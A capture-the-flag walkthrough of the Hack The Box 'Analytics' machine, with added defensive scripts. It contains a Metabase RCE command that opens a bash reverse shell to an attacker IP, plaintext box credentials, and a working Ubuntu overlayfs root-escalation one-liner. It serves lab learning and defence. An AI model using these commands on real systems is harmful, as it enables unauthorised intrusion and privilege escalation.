80/tcp open  http    nginx 1.18.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://analytical.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


 

A couple of things to add to /etc/hosts; we find the data subdomain because that's where the login page is:

analytical.htb
data.analytical.htb

analytical.htb dirbuster:

/images               (Status: 301) [Size: 178] [--> http://analytical.htb/images/]
/js                   (Status: 301) [Size: 178] [--> http://analytical.htb/js/]
/index.html           (Status: 200) [Size: 17169]
/css                  (Status: 301) [Size: 178] [--> http://analytical.htb/css/]

Names found:

Jonnhy Smith
Alex Kirigo
Daniel Walker

Email format:

[email protected]
 

Intercepting the reset-password request with Burp Suite on the login page gives us a ton of data.

Username found: camsaul

/home/camsaul/toucan_sightings.sqlite

We find this cookie in the output above, but I can't seem to do anything with it:

"analytics-uuid":"a9f05e66-ef41-4811-a644-fde212051d7e"
metabase.DEVICE=a9f05e66-ef41-4811-a644-fde212051d7e
"setup-token":249fa03d-fd94-4d5b-b94f-b4ebf3df681f

data.analytical.htb/app/assets/img/site.webmanifest

Using a script we find on GitHub we can get RCE. This script requires a setup token, which we found in that interesting.txt file from Burp Suite, or at http://data.analytical.htb/api/session/properties:

python3 main.py -u http://data.analytical.htb -t 249fa03d-fd94-4d5b-b94f-b4ebf3df681f -c "bash -i >& /dev/tcp/10.10.14.20/9999 0>&1"
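The reason the script works at all is that the setup token is served to anyone who asks, so the check an administrator of a Metabase instance wants is whether their own deployment still returns one. The following is an added example written for this writeup; it is not code from the box, from the GitHub script, or from Metabase. It assumes /api/session/properties is reachable over plain HTTP(S) without authentication (as it was here), and the JSON bodies are constructed samples with a placeholder token, not the box's real one.

```python
"""Check whether a Metabase instance still exposes its setup token.

Added example for this writeup; not code from the box, from the GitHub
exploit script, or from Metabase. The sample JSON below is constructed
to mimic the shape of the /api/session/properties response and uses a
placeholder token, not the real one from the box.
"""
import json
from urllib.request import urlopen

# Constructed sample of a leaky properties response (placeholder token).
SAMPLE_LEAKY = json.dumps({
    "site-name": "Analytics",
    "setup-token": "00000000-0000-4000-8000-000000000000",
})

# Constructed sample of an instance whose setup has been completed.
SAMPLE_CLEAN = json.dumps({"site-name": "Analytics", "setup-token": None})


def setup_token_exposed(properties):
    """True if the unauthenticated properties carry a usable setup token."""
    token = properties.get("setup-token")
    return isinstance(token, str) and token.strip() != ""


def preview(token):
    """Show only a prefix so the full token never lands in a log line."""
    return token[:8] + "..."


def assess(raw_json):
    """Parse a properties body and return a small finding dict."""
    try:
        props = json.loads(raw_json)
    except json.JSONDecodeError:
        return {"exposed": False, "error": "response is not JSON"}
    if not isinstance(props, dict):
        return {"exposed": False, "error": "unexpected JSON shape"}
    if setup_token_exposed(props):
        return {"exposed": True, "token_preview": preview(props["setup-token"])}
    return {"exposed": False}


def check_instance(base_url, timeout=5):
    """Fetch /api/session/properties from a live instance you administer."""
    url = base_url.rstrip("/") + "/api/session/properties"
    # Assumes the endpoint answers without auth over plain HTTP(S).
    with urlopen(url, timeout=timeout) as resp:
        return assess(resp.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    for label, body in (("leaky", SAMPLE_LEAKY), ("clean", SAMPLE_CLEAN)):
        print(label, assess(body))
```

Run `check_instance("http://your-metabase")` against an instance you own; an `exposed: True` result means the setup flow is still open to unauthenticated callers, and the fix is to finish setup, keep Metabase patched, and not leave the instance reachable from untrusted networks.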

We are trapped in a Docker container.

I spent days searching through every file and every directory without finding anything. I tried so many different things, but nothing worked.

UNTIL I found a cool enumeration script for Docker (https://github.com/stealthcopter/deepce/blob/main/deepce.sh).

The script finds creds that we can use for SSH, and we are no longer in the Docker container:

META_USER=metalytics
META_PASS=An4lytics_ds20223#
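What deepce surfaced here is a plaintext credential passed into the container as an environment variable, which every process in the container (and `docker inspect` on the host) can read. As an added example, not code from the writeup or from deepce, here is a small scanner for that condition; the environment text is constructed with placeholder values in the shape of `/proc/1/environ` split on NULs, and the variable-name pattern is an assumption to tune per environment.

```python
"""Flag plaintext credentials handed to a container through its environment.

Added example for this writeup, not code from the box or from deepce.
SAMPLE_ENV is constructed: it mimics `tr '\\0' '\\n' < /proc/1/environ`
(or the Env list in `docker inspect`) with placeholder values.
"""
import re

# Variable names that usually carry a secret (assumed list; tune as needed).
SECRET_NAME = re.compile(r"PASS(WORD)?|SECRET|TOKEN|API_?KEY|PRIVATE_?KEY", re.I)

# Constructed sample environment; values are placeholders, not real creds.
SAMPLE_ENV = """\
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
HOME=/root
META_USER=metalytics
META_PASS=placeholder-not-the-real-password
APP_PORT=3000
API_TOKEN=placeholder-token-value
EMPTY_SECRET=
"""


def parse_env(text):
    """Split KEY=VALUE lines into a dict; lines without '=' are ignored."""
    env = {}
    for line in text.splitlines():
        if "=" in line:
            key, value = line.split("=", 1)
            env[key] = value
    return env


def mask(value):
    """Keep two characters so a finding is recognisable without leaking it."""
    return value[:2] + "*" * max(len(value) - 2, 3)


def find_exposed_secrets(env):
    """Return [(name, masked_value)] for secret-looking, non-empty variables."""
    return [(k, mask(v)) for k, v in env.items() if SECRET_NAME.search(k) and v]


def audit_env_text(text):
    """Convenience wrapper: raw environment text in, findings out."""
    return find_exposed_secrets(parse_env(text))


if __name__ == "__main__":
    for name, masked in audit_env_text(SAMPLE_ENV):
        print(f"{name}={masked}  (plaintext secret in container environment)")
```

On a real host the input would be the output of `docker inspect` or `/proc/<pid>/environ` for the container's init process. Findings like `META_PASS` are the cue to move the value into a mounted secrets file with tight permissions (or a secrets manager) instead of the environment, and to rotate it, since a credential that is readable inside the container is also what lets an attacker who lands there pivot to SSH on the host.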

 

The box is running a version of Ubuntu which has a fresh 0-day exploit; there are a ton of POCs online, and the first one I tried worked. (From SSHing in, it took me 30 seconds to obtain root, as I had already been trying to get root in the container with this exploit.)

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'

We are root.
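The first thing the POC above does is `unshare -rm`, which only succeeds when unprivileged users may create user namespaces. Patching the kernel is the real fix, but until that lands, turning off unprivileged user namespaces blocks this whole family of POCs. The script below is an added example for this writeup, not part of the original post: it reads the two sysctls that govern this (`kernel.unprivileged_userns_clone` is Ubuntu-specific and may be absent on other distributions; `user.max_user_namespaces` is upstream) and prints a verdict. The caveat is that some sandboxes (browsers, rootless container tooling) rely on user namespaces and will stop working when they are disabled.

```shell
#!/bin/sh
# Added example for this writeup, not part of the original post.
# Reports whether unprivileged user namespaces (which `unshare -rm` needs)
# are available on this host. Disabling them is a stop-gap mitigation until
# the kernel is patched; it can break sandboxes that depend on them.

# Pure function so the logic can be tested without touching /proc.
# $1 = kernel.unprivileged_userns_clone (Ubuntu-specific; "absent" if missing)
# $2 = user.max_user_namespaces
userns_verdict() {
    clone="$1"
    maxns="$2"
    if [ "$maxns" = "0" ]; then
        echo "restricted: user.max_user_namespaces=0"
    elif [ "$clone" = "0" ]; then
        echo "restricted: kernel.unprivileged_userns_clone=0"
    else
        echo "exposed: unprivileged user namespaces allowed (clone=$clone max=$maxns)"
    fi
}

# Read a /proc/sys file, printing "absent" when the knob does not exist.
read_sysctl() {
    if [ -r "$1" ]; then
        cat "$1"
    else
        echo absent
    fi
}

# Live check against the current host.
check_host() {
    clone=$(read_sysctl /proc/sys/kernel/unprivileged_userns_clone)
    maxns=$(read_sysctl /proc/sys/user/max_user_namespaces)
    userns_verdict "$clone" "$maxns"
}

check_host
```

On Ubuntu the stop-gap is `sysctl -w kernel.unprivileged_userns_clone=0` (made persistent in /etc/sysctl.d/); on kernels without that knob, `user.max_user_namespaces=0` has the same effect. Re-run the script afterwards and expect a `restricted:` line.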